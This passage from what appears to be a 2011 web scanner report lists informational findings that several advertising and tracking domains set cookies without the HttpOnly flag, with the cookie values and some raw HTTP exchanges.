rsiPus_e91p="MLsXrrEOpxpv55C28tahZ2a57v6B9Bu9Y8OavLvXmNxWuZvP+AaSaAp+hCNi+AtwyjQq0FGvdh22EkMWeQ9fGdEUI3HmvYpj5SgWK/o8cPKd8tOuEYJL0wlkfqzlMraspaCjv4UWwC4Z+x1eEABecffWNgSWE4KnGcXxROUtwq+YkQ+ROJeSLZa64yaZq55nTns5r2mZkplqIZumEiheUMs5slvBXG9TDF4tqMsPj0dqmdcss/G1eCVOUn1kH/1pans4mGDFVBfL5LYH5naxSrQiAxQLIWBQEyel6a05pjv5OKG9gWRvbsprd8pte1GF0b/98upmtGe5+T8rl7M/aBeOhlVkn8U3BODWfJ5FjKLQ6+SM2Tql5LU0udnBQGDTksgMhpTK/qD4jDVsHhTVoKEiN2xMdNCQCd/0b+L3bBkU2keS+AnYoKkQXitLohs94CqrR2ic7gZtTC9/a4B9DmKE4dqTbcCDXjyu9q7OQ5IB0sPtUik5YDyOv0GOqbcr4C5W0WY3j61x1Fu8SczRrDGnC8mOoCcyxXldULtPjLgxm+kbmxt1WGpJcYK6DwbA9EwEJdq3ynG01XoLZujzgmq8VNM4pRuymWGMOSxMheDOLa7CHyqzSsRDFd8jK6+oXgQ8tR2Kzvet9TihmfalZ0QUeSwQxgko/JGFC3tZWrdushgVo/RPztPl2qZwoXOjMfEegk9NGFrafOuWCApavQXJY/f7mq8UVDViXiubtMeqFsOziKPyOWG3zl4LWECNuYTh6QV/lfznDtAlVqSQLVCxhO0yx+F56HDso4xVdfo8rsikqcuEQQyQq34tIIoXZIuf5lCr+T8fmJnJPm511jrxjq0YjKAVbynso8dLaXxSzg+RRH+7DBBevYGlsTN9fnks2O+R4Rll8rnPB55zQVyCy7AdTYgUmrOpyEUXvd+ee0UDzLbXEmv5Fdo4Zby7ab6iaGcPz+Ic6q/5ATi+5Jl1v9cbuJwlhNyrFs6PLxaNCjsCwK8fBou2iWX3XiyjXLJIDZrRn7k3KssmXbuouSaJj5MmLEtuTqpQEfmDaW8tPXGLnkuSodpzsa52hV/J/4tYYyVYa+6oQduqrX2mAnx5Ngj3hiSlg7Kc19WJejD9gNPJWL5drJWyrlT9qztxiaosdVzngLULjeXdvuPfxbNhWQt/RUrTWqJvSrOJXaTlMkRYOMNJyLWagCPN3Bg8aqJHVDgLKn1Bl1+y/ng2hDrOa9kLIGn1TSFXM9w3MbY7RJAZEAkzMewYAQuPGB6Jlz3l1PibztByiunECDF6Xn3UVzWUhAUDilaestchXm/fUiJySFBUvKz4ROh8uRnWzV61zfCMnblteUeVIn+CxkHyEB07JYVb9/YU4o+60Zdlc3PZ3A=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMV4ymjOBYY7dXiYRm+XFX5ofJL+XaDC1GrYq+k4LFA7AqIB3dIqs9Sd2ioTUrqF1R0wWmoU9fJlXau7UsOfVkSJLrvRn9MkFEuSlV/pIwfQcjJurrbgDRlCAhEEGgwcWiqZPBhtxL5iYQN8iKHduWI0WlUEJSZZkPBbV75bCDyjKs3Zjsl9SHtBD3AIbF+JCELUguXthiXlrjKwxn+O2WiMr6gj//AspzgtNnYh/V97ghHKaWR+4p6Ok1kJPfpk4DKtBpHsYMqDZ8fSeVxjfPuMkPs1z6bZqzYuMAvI3BewyRJN8GzTmwHIN2kue/7KUIL1oHMKwDD8ltQo5p7VskyyjwwN9Yij1tyET3VGXjLEjI/nAzTRnRebb1szJ0uCHw4zWluYO5jx8H6EiqKmsl9XgOYOwqaxXd0n/SZKkequEUP+X64sA1YF6Y63Ko5Gf74STXoU8IQzWXINOz2oaVAxi2E6cbXd1xfE8ZGaeNwP0/G4ooQ6+9zBM+zRHv99tL8VYrniDlsnAUHFv3YI7oy0EJA+ppEVslPiA8T8hk9z58JfbLt3583r/oh0CUiTeEJwImw2bXKSKOKmbzBfEWDfbFVR+urml7h3h0sHU1ajQhdpWcafyj6OjqPMO7rL09Er+c6X82RWehe3KxOzTcX6iaSOGb46BCxT89wS0PyQCHK6Wivu+f1KlNTkQULMjwPI7zPfTmVsMvRWhRa81ywmJYO1UbcmcMbcXpjP5hcZHNiEvCaLn49VgjYrqaAEirB5mUgEKQXyFZKbK6Xib5KU4rwj9XNIFEdZcqKXQ1oAD50N1jBDuRIftWDOz+Q1MBwu9O3bCFKJSMUBpyuDpU8w+KkZpB/DUhXKNMx4Gc8CuakVgynlAFnVBjJG30x4tvmp+JXAHZPi7eIZEP/51nUmy69Z9B/5U3xxiL2Zty/ZFM6lvv9Kt6179IEre0BmsU98AFtNwX/P/aDloGEiFXSA/hjDrntaLGbdQUkMjs9A6KCH29VwTxv/EtKW2Bh8w7j/ClSeN2cO6T6YsYLo7qhi4Ud9PCVpPJEx1G6JfMWteSnQsd7QyhwS91ppg85wlSvHdgj5Rte+VtJmYfNsO3UBtO2TV5wnbdk5QzgEG0vkLbLY7JvIVBQO4tuMXW1MS6iI1ojHkPINvyxoG2b5NNGprWR7+CS+/MopOVRNjOkQPBs6uV7nofHrdbbAlQjobTeurCqZ8AcdF9T+AfaBpZwMsqCDghxge5OUtGAMwKfwpKxqTP6P5anh6y4Hm7/MY3N9ijWkIiPe1Gtbg/rmoVgRe9YQRIU06+vqkZ6bp2/EovzBD4bGgVofLnR1ikmeLTwW5MCP87mXfWEMueQuIC+M/VIBAXmG2NjHUQIsVfgGUZFStjaImVmNPog399Ta4fiUJnYZdom7yhsR4OI2SyjH8JN2DycqtZ6KLTOz9IG3GPtxi8Sw+svFJy2Fz6AW0DOsk4N3bGmcP73WwE3d6XNMgr7Otm/76nd02bz6P0rXo2GYxn1hC2DMTpLhNbmWJ25jCFDqxtZJu8NqeNJisK8IZZ5XoV+UL9KijMAKjDh1Qcfi+fa3BEv5h2gbLgAdb9mbO22jSVbwVE4RolUufRnhMwWtwHaKayK6t/hsMK9orgjgWhSOegvrBoUu6h7Ym91/g4JyZEuHU8gtb922aohYq1ZGxBYvFdnyKoLoCmyLUgPj1CeUz7itsWeintRACO+n8D1mOeHqFataRuQbaQsL6GdVpf3Npp0ohbzOELmr89F01YACOkONCJm2bsHgZzWB/9ErNJu/nYRYw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UVQe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UVQe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_e91p="MLsXrrEOpxpv55C28tahZ2a57v6B9Bu9Y8OavLvXmNxWuZvP+AaSaAp+hCNi+AtwyjQq0FGvdh22EkMWeQ9fGdEUI3HmvYpj5SgWK/o8cPKd8tOuEYJL0wlkfqzlMraspaCjv4UWwC4Z+x1eEABecffWNgSWE4KnGcXxROUtwq+YkQ+ROJeSLZa64yaZq55nTns5r2mZkplqIZumEiheUMs5slvBXG9TDF4tqMsPj0dqmdcss/G1eCVOUn1kH/1pans4mGDFVBfL5LYH5naxSrQiAxQLIWBQEyel6a05pjv5OKG9gWRvbsprd8pte1GF0b/98upmtGe5+T8rl7M/aBeOhlVkn8U3BODWfJ5FjKLQ6+SM2Tql5LU0udnBQGDTksgMhpTK/qD4jDVsHhTVoKEiN2xMdNCQCd/0b+L3bBkU2keS+AnYoKkQXitLohs94CqrR2ic7gZtTC9/a4B9DmKE4dqTbcCDXjyu9q7OQ5IB0sPtUik5YDyOv0GOqbcr4C5W0WY3j61x1Fu8SczRrDGnC8mOoCcyxXldULtPjLgxm+kbmxt1WGpJcYK6DwbA9EwEJdq3ynG01XoLZujzgmq8VNM4pRuymWGMOSxMheDOLa7CHyqzSsRDFd8jK6+oXgQ8tR2Kzvet9TihmfalZ0QUeSwQxgko/JGFC3tZWrdushgVo/RPztPl2qZwoXOjMfEegk9NGFrafOuWCApavQXJY/f7mq8UVDViXiubtMeqFsOziKPyOWG3zl4LWECNuYTh6QV/lfznDtAlVqSQLVCxhO0yx+F56HDso4xVdfo8rsikqcuEQQyQq34tIIoXZIuf5lCr+T8fmJnJPm511jrxjq0YjKAVbynso8dLaXxSzg+RRH+7DBBevYGlsTN9fnks2O+R4Rll8rnPB55zQVyCy7AdTYgUmrOpyEUXvd+ee0UDzLbXEmv5Fdo4Zby7ab6iaGcPz+Ic6q/5ATi+5Jl1v9cbuJwlhNyrFs6PLxaNCjsCwK8fBou2iWX3XiyjXLJIDZrRn7k3KssmXbuouSaJj5MmLEtuTqpQEfmDaW8tPXGLnkuSodpzsa52hV/J/4tYYyVYa+6oQduqrX2mAnx5Ngj3hiSlg7Kc19WJejD9gNPJWL5drJWyrlT9qztxiaosdVzngLULjeXdvuPfxbNhWQt/RUrTWqJvSrOJXaTlMkRYOMNJyLWagCPN3Bg8aqJHVDgLKn1Bl1+y/ng2hDrOa9kLIGn1TSFXM9w3MbY7RJAZEAkzMewYAQuPGB6Jlz3l1PibztByiunECDF6Xn3UVzWUhAUDilaestchXm/fUiJySFBUvKz4ROh8uRnWzV61zfCMnblteUeVIn+CxkHyEB07JYVb9/YU4o+60Zdlc3PZ3A=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMV4ymjOBYY7dXiYRm+XFX5ofJL+XaDC1GrYq+k4LFA7AqIB3dIqs9Sd2ioTUrqF1R0wWmoU9fJlXau7UsOfVkSJLrvRn9MkFEuSlV/pIwfQcjJurrbgDRlCAhEEGgwcWiqZPBhtxL5iYQN8iKHduWI0WlUEJSZZkPBbV75bCDyjKs3Zjsl9SHtBD3AIbF+JCELUguXthiXlrjKwxn+O2WiMr6gj//AspzgtNnYh/V97ghHKaWR+4p6Ok1kJPfpk4DKtBpHsYMqDZ8fSeVxjfPuMkPs1z6bZqzYuMAvI3BewyRJN8GzTmwHIN2kue/7KUIL1oHMKwDD8ltQo5p7VskyyjwwN9Yij1tyET3VGXjLEjI/nAzTRnRebb1szJ0uCHw4zWluYO5jx8H6EiqKmsl9XgOYOwqaxXd0n/SZKkequEUP+X64sA1YF6Y63Ko5Gf74STXoU8IQzWXINOz2oaVAxi2E6cbXd1xfE8ZGaeNwP0/G4ooQ6+9zBM+zRHv99tL8VYrniDlsnAUHFv3YI7oy0EJA+ppEVslPiA8T8hk9z58JfbLt3583r/oh0CUiTeEJwImw2bXKSKOKmbzBfEWDfbFVR+urml7h3h0sHU1ajQhdpWcafyj6OjqPMO7rL09Er+c6X82RWehe3KxOzTcX6iaSOGb46BCxT89wS0PyQCHK6Wivu+f1KlNTkQULMjwPI7zPfTmVsMvRWhRa81ywmJYO1UbcmcMbcXpjP5hcZHNiEvCaLn49VgjYrqaAEirB5mUgEKQXyFZKbK6Xib5KU4rwj9XNIFEdZcqKXQ1oAD50N1jBDuRIftWDOz+Q1MBwu9O3bCFKJSMUBpyuDpU8w+KkZpB/DUhXKNMx4Gc8CuakVgynlAFnVBjJG30x4tvmp+JXAHZPi7eIZEP/51nUmy69Z9B/5U3xxiL2Zty/ZFM6lvv9Kt6179IEre0BmsU98AFtNwX/P/aDloGEiFXSA/hjDrntaLGbdQUkMjs9A6KCH29VwTxv/EtKW2Bh8w7j/ClSeN2cO6T6YsYLo7qhi4Ud9PCVpPJEx1G6JfMWteSnQsd7QyhwS91ppg85wlSvHdgj5Rte+VtJmYfNsO3UBtO2TV5wnbdk5QzgEG0vkLbLY7JvIVBQO4tuMXW1MS6iI1ojHkPINvyxoG2b5NNGprWR7+CS+/MopOVRNjOkQPBs6uV7nofHrdbbAlQjobTeurCqZ8AcdF9T+AfaBpZwMsqCDghxge5OUtGAMwKfwpKxqTP6P5anh6y4Hm7/MY3N9ijWkIiPe1Gtbg/rmoVgRe9YQRIU06+vqkZ6bp2/EovzBD4bGgVofLnR1ikmeLTwW5MCP87mXfWEMueQuIC+M/VIBAXmG2NjHUQIsVfgGUZFStjaImVmNPog399Ta4fiUJnYZdom7yhsR4OI2SyjH8JN2DycqtZ6KLTOz9IG3GPtxi8Sw+svFJy2Fz6AW0DOsk4N3bGmcP73WwE3d6XNMgr7Otm/76nd02bz6P0rXo2GYxn1hC2DMTpLhNbmWJ25jCFDqxtZJu8NqeNJisK8IZZ5XoV+UL9KijMAKjDh1Qcfi+fa3BEv5h2gbLgAdb9mbO22jSVbwVE4RolUufRnhMwWtwHaKayK6t/hsMK9orgjgWhSOegvrBoUu6h7Ym91/g4JyZEuHU8gtb922aohYq1ZGxBYvFdnyKoLoCmyLUgPj1CeUz7itsWeintRACO+n8D1mOeHqFataRuQbaQsL6GdVpf3Npp0ohbzOELmr89F01YACOkONCJm2bsHgZzWB/9ErNJu/nYRYw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:38 GMT
Content-Length: 2299

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.62. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_LKv8="MLsXrrEOpxpv55C28tahZ2a57v4BlBldCJ+Iio1e3Hap1Il9kVWT6VLylaFsMiOIFsKHpjjz7J2U7z9Uo4JeZID1W23WKas0Wh9C6Sor/tzggGLG8gt5zaN4m4WCHIidCpV6s3HMduhPPOd/6/olAcH77sPsFms0zIbhzNkwT9vKMU81lpWZk1hblau2nsfXOr2KsTF2nk2To/EmZI/ry2OVE13p6cA6rTTEk45VWgFNzHgRD9gBbu89J7MfO4f070NcasoleESOqPrJoAP0gbCr4HCJhVixf5QrQTSZEBNgGBsQs+nq3jKvbaIkKQgR2iWvce7Q7r7mn6DXgQoxk5Tc5XaZ26hUUK613yi5NPphPfjyJS5dNn6cor+5Z7/2w3GYUjhihK8UhHxBga6IzOc37/8ibz0xRpSwHDTgnZJmdSouDmILRcdLlOCqO2KvS8CglyIyIW36CjCyqPKXZ4mA+Ch2F7VzK1m4ynmwvMzE71WWAm9cuv1GAdRRNpmJeDTgdJLe5OePC2hhiMIwAh/LQpSKkYrFcAsXYhZ8x2aBT0Ry0BO7QXLXKedgCeNMMCOF+CBkmO8YeNkfEsag2hVDbdJ9ACEK/9eg5SEAZFPfmDNt2tj2Ive5NyF4L0J8+JNCfYqY2FcOywI4omJJUnsX2TgkFngrQVU5K0yXFYE47bgxdx6YBA/4IXTuF0oGmxLuY7MSgWmNt8J7Xl5naLyZNUEwjp30jM5mNPCnGx4DFUAsxq7Yojzi/6hvo1fbz2JPQytoz0FEDVAJEeN2yP0IsMD5jItWPUv7Wx1AX7BAgwjJ4RMIwhwVlxJl9eoB2GMv1GB+8rrbAB9JwdaoP9lw7ezBcOJkp+N1aBrbLaNdoiJs/tXABJ8fRJ3A09CfnY0IjO2OzSoL4a75tNhRCfLQCzKrd+0HJP/8Y+q+ZXwLhuINuKf7CjTqzqhiG1tOtM4bvtzZG52dZgOJRnICiL1WDobijiTGfV6yV7JbAY/Zx5Uj69IrD7PwohPAkfVj7374Hf0Mnk/V8lbUnEAiHKOWdDRM0vEHnJohXzsgNusj9VGXR0TAtczxjdxPwOxJK6PC0aZ93oM725lCigs3hxCnE7kpU6IaDCYi0U0Jf+h9RTbohCnJCS6b3Dd2l8pJw/6902gfxDyhg25fVt6lGrrCscWGC/PAtNaccUCI5BPyRyOludJgBzYr/ULdM/jlcEo6n3igTIpIeWIa5s378NY8CUro/sTIkMTtiwIUFGHuZ/4k8b8alBAdnqbr3UzFBL8d45cKuIO1mY03cnXCDOmOWQoLCg6BiMYfhaMhueht/Mays9BrXFCmJHyGf4LBdNeeI1EYCweAIZJqsJb90A=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMV4y+jOBYULQEEu6zYIA6DmFfDuOqv5R26co+k4LFAgBjGPtxaqC9ZQYFpxPJB8bqfwyN2xvBNX+iHnk3gvE8eBlgm3HLVc4NN303pzfdAGd8THA8HLXYXGA4tFNY3PjIDERCnonHtyxCDqGK+h70Y1wW9gOCkLl/7j7cT18RsMCq8cq9jz18La4D9oeCWufq45MNWcIXHPCvDBhXLnLByUsphq7XP04fqyRmBWanY8QIwqe75K7q/Vwh8ZJJ/Gx0ehFvayx3fVqHTSStYdZDNt3IfJK53dMC/f6WOx26le6GEuhTa6ej92sZrv5cyBWYYpDis3r338ptcasgHhio3YxAvf9TKp7LJwVVJ0d1JBLfyr/tZkhZc3Iy/8F++PCDZl3jq+OQjK4lyVnka0FxyVNMJsJmek2qwDrWHGKp8n4mXeZZdqWVVDNe6WOl4hg6Kj83BTlH6ux2EdYdyUVQjkBiDZ9gX1Wq0fEE1ek70c1nCmi+JUxETvwlfDBnEFNEZRIHwYUYLppsu6jk5asJFOT0nvpUeQkBTKgjW/Qn6eUtNAFG3+ztEjIjQvTEffA8qO58M+LeTVBxlhV0QJRYVW5Sx/JvI8e/akogNcHmtI7QD7QCgXe7isimAa7ntSOlWeluX8QMr2NJrrA3feWM2vTctmlJrwKofmBqWxDUDvxWG9RACZKhtIz3loTOuDS8nt/ha2/RYZsuHkji206e8ZYmB4eInuvlia9FbYHnFmPQcI8rs2jFIlJiD/QoPMch6qhpvzlf2RVEOj7qwu77+u8ZPF4WZaFrEghhw0AOJMD4tZZiZ0eRa1MmEtfLpEOF8Kq5/iF7fivLDn2D5HtRMSwwHaH8bFxSAHlzo87FKMM8LER9fFAsq/p1AuC1NMlYq6y0KDDdOYsXpVt7jYnQKccmrQ0fFoziIhjSzxqxXYoO4thHbiNDS3xkLH1Ta+1mU0fyTq3ZzznAhgDSIJImy836OzEGaR1WATENi8R/Ytg1t922JDjCG+6xWxYH0/1smsb5QB5IhH1x1a+chdLQVN2cHarmbcLXxvA8mzpFdJjnCvluzCXcucCjM2DkC3Vt/BPkNnrUYYZXemmMpBv9wnfdCDH/nppqPyG1yEquvHgyXy8O0Lx2OjYs86J6WUJZp7jYn0wUqWgWpu+dLkhSogQt16WCSC/Mo5GZaJnOEQDBr+uObnof5LdUU4kVQkLaAFs0qZkAZdl9D8ATaDprwMsqCDBEtkIvkm+7bGG3HgUkEvimD7d6yYIqxnlqYhsEpzJXgxB+EVuqz6JrKzXN/YEdQoWlrrDd3h7MvdFZZDpahkTMlBNskf2oL7AgE1sTeI4cN+Yf2C5zc4lrZdkbIMiiOHrZ7DSfgcWKy6CJh4IFeW2qekL4a4MX+JcYheCOgFqy5z1VHd3htmELIsGH54U9aipoIypwBzYJYdJ0vSf0ZlDA+vvUfB79+dIFKS459vMw4wFSFxNWukNCa9Wy0SLf5o196R6Ng7j+BJ1+cVI4ZPQK2etvn6iKtGhCJP9/xPbB9LFRuP18uxi77Ua7NeKXS/6AG1xTM6Uknx6Kl2ZPn5dD5hExnx+6G2PpwPlXZcGvACLhclftvVowXjk5WwX/VgyOD/5Imybyjeq2ZWmcNhTYhgwG5OlYxJUH/UIaBGjM/VR+Jxuyq00EaEz5xPdmMHUpYvuGNWncrosKFhNyJyJyAKAjNfH2UM1fYgiVrIrfaL5LMxnGjWlf3qgGvkqibSs0ijM7JhiwE6kUybzSVAf1B6bDn"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.63. http://ads1.revenue.net/j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.revenue.net
Path:	/j

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Train0=.CAB92OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDkxNDoxsAEEMDE3MTQ6LSkEAAcxMzA1MjAxNzE0EQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.64. http://ads1.revenue.net/load/227245/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.revenue.net
Path:	/load/227245/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDU2MjoxsAEEMDEzNjI6LSkEAIwEmgJ8dnQEIAdNATVUDydOATUxKUQBCS06MTMwNTIwMTM2MhEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.65. http://akatracking.esearchvision.com/esi/redirect.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://akatracking.esearchvision.com
Path:	/esi/redirect.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.66. http://akatracking.esearchvision.com/esi/redirect2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://akatracking.esearchvision.com
Path:	/esi/redirect2.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esi/redirect2.html?esvstue=1305198071&esvadt=999999-2475-1260-1&esvq=private%20equity&esvrq=private%20equity&esvcrea=187139093&esvt=128-MSUSe20937&transferparams=0&esvaid=40007&url=http%3a%2f%2fad.doubleclick.net%2fclk%3b233236047%3b62821348%3bd%3fhttps%3a%2f%2fpersonal.vanguard.com%2fus%2ffunds%2fsnapshot%3fFundId%3d0051%26FundIntExt%3dINT%26WT.srch%3d1%3fWT.srch%3d1 HTTP/1.1
Host: akatracking.esearchvision.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ESVUSERID=f20c82c6e40fc343b5bded3feff6e6ee

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://ad.doubleclick.net/clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: ESVA40007=esvcid=S1305198071_UIDf20c82c6e40fc343b5bded3feff6e6ee_ADOMSe_AGI1260_ADI2475_CRE187139093_TID20937_TRMcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d_RAWcHJpdmF0ZSUyMGVxdWl0eQ%3d%3d;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
Set-Cookie: REFESEVA40007=;expires=Fri, 11 May 2012 11:01:11 GMT;path=/;domain=esearchvision.com
ETag: "c7728f1f5feca396220a5389a6a06c7d:1304367611"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Vary: Accept-Encoding
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
P3P: CP="NON DSP COR ADM PSA IVA OUR STP NAV"
Cache-Control: max-age=34120
Date: Thu, 12 May 2011 11:01:11 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

14.67. http://altfarm.mediaplex.com/ad/js/15917-119013-26745-9 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/15917-119013-26745-9

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Sun, 12-May-2013 4:51:06 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.68. http://amch.questionmarket.com/adsc/d908257/6/911744/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d908257/6/911744/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 12 May 2010 11:39:44 GMT; path=/; domain=.questionmarket.com
CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1_912025-2-4_911744-6-1; expires=Mon, 02 Jul 2012 03:39:45 GMT; path=/; domain=.questionmarket.com
ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-<E_908257-ON6)M-0; expires=Mon, 02-Jul-2012 03:39:45 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.69. http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/200214693344/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 12-May-2010 11:15:54 GMT; path=/; domain=.questionmarket.com
CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_912024-2-1_200214693344-2-1; expires=Mon, 02-Jul-2012 03:15:55 GMT; path=/; domain=.questionmarket.com
ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-*66)M-4; expires=Mon, 02-Jul-2012 03:15:55 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.70. http://amch.questionmarket.com/adsc/d909615/2/200214693345/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d909615/2/200214693345/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Wed, 12-May-2010 11:28:16 GMT; path=/; domain=.questionmarket.com
CS1=500004878102-36-2_41958464-12-1_909246-8-3_41150843-4-1_898593-4-11_898578-4-13_887955-1-2_912027-2-2_912026-2-1_200214693345-2-1; expires=Mon, 02-Jul-2012 03:28:17 GMT; path=/; domain=.questionmarket.com
